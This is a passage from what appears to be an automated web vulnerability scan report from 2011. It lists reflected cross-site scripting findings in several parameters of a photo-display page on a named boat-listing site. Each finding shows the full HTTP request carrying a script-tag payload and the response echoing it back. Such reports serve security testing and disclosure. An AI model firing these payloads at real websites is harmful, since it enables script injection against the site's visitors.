ITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 500 Internal Server Error
Date: Thu, 27 Jan 2011 20:29:12 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<br>'+ 'ExceptionMessage: For input string: "20479061848e';alert(1)//d11de79295f"<br>
...[SNIP]...

3.478. http://www.yachtworld.com/core/listing/pl_display_photo.jsp [boatname parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_display_photo.jsp

Issue detail

The value of the boatname request parameter is copied into the HTML document as plain text between tags. The payload 3215e<script>alert(1)</script>501866bdbeb was submitted in the boatname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/pl_display_photo.jsp?&hosturl=starlingmarine&&ywo=starlingmarine&slim=broker&boat_id=2047906&boatname=23%27+Contender+3215e<script>alert(1)</script>501866bdbeb&photo_revised_date=1237828294000&photo_name=Photo+1&photo=1&url= HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:29:31 GMT
Server: Apache
Cache-Control: private
Content-Length: 5851
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!-- /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/starlingmarine/boats.header.html:/opt/weblogic/waeyw/ywcluster/public_html/broker_pages/starlingmarine/boats.footer.html
...[SNIP]...
<h1>23' Contender 3215e<script>alert(1)</script>501866bdbeb</h1>
...[SNIP]...

3.479. http://www.yachtworld.com/core/listing/pl_display_photo.jsp [hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_display_photo.jsp

Issue detail

The value of the hosturl request parameter is copied into an HTML comment. The payload 15d03--><script>alert(1)</script>de738e99a4e was submitted in the hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /core/listing/pl_display_photo.jsp?slim=broker&ybw=&boat_id=2047906&boatname=23%27+Contender+&photo_revised_date=1237828294000&photo_name=Photo+2&photo=2&hosturl=starlingmarine15d03--><script>alert(1)</script>de738e99a4e&&ywo=starlingmarine& HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:31:14 GMT
Server: Apache
Cache-Control: private
Content-Length: 1141
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<script>alert(1)</script>de738e99a4e/boats.header.html:/opt/weblogic/waeyw/ywcluster/public_html/broker_pages/starlingmarine15d03-->
...[SNIP]...

3.480. http://www.yachtworld.com/core/listing/pl_display_photo.jsp [hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_display_photo.jsp

Issue detail

The value of the hosturl request parameter is copied into the HTML document as plain text between tags. The payload 988e4<script>alert(1)</script>08db9c89d2e was submitted in the hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/pl_display_photo.jsp?slim=broker&ybw=&boat_id=2047906&boatname=23%27+Contender+&photo_revised_date=1237828294000&photo_name=Photo+2&photo=2&hosturl=starlingmarine988e4<script>alert(1)</script>08db9c89d2e&&ywo=starlingmarine& HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:31:06 GMT
Server: Apache
Cache-Control: private
Content-Length: 1129
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

 Exception while reading the file:/opt/weblogic/waeyw/ywcluster/public_html/broker_pages/starlingmarine988e4<script>alert(1)</script>08db9c89d2e/boats.header.html exception is java.io.FileNotFoundException: /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/starlingmarine988e4<script>
...[SNIP]...

3.481. http://www.yachtworld.com/core/listing/pl_display_photo.jsp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_display_photo.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c70f4"><script>alert(1)</script>fd739562066 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/pl_display_photo.jsp?c70f4"><script>alert(1)</script>fd739562066=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:29:12 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<META HTTP-EQUIV="Content-lan
...[SNIP]...
<a href="/core/uk/listing/pl_display_photo.jsp?c70f4"><script>alert(1)</script>fd739562066=1">
...[SNIP]...

3.482. http://www.yachtworld.com/core/listing/pl_display_photo.jsp [photo_name parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_display_photo.jsp

Issue detail

The value of the photo_name request parameter is copied into the HTML document as plain text between tags. The payload 18db0<script>alert(1)</script>a6499d1e16 was submitted in the photo_name parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/pl_display_photo.jsp?&hosturl=starlingmarine&&ywo=starlingmarine&slim=broker&boat_id=2047906&boatname=23%27+Contender+&photo_revised_date=1237828294000&photo_name=Photo+118db0<script>alert(1)</script>a6499d1e16&photo=1&url= HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F226647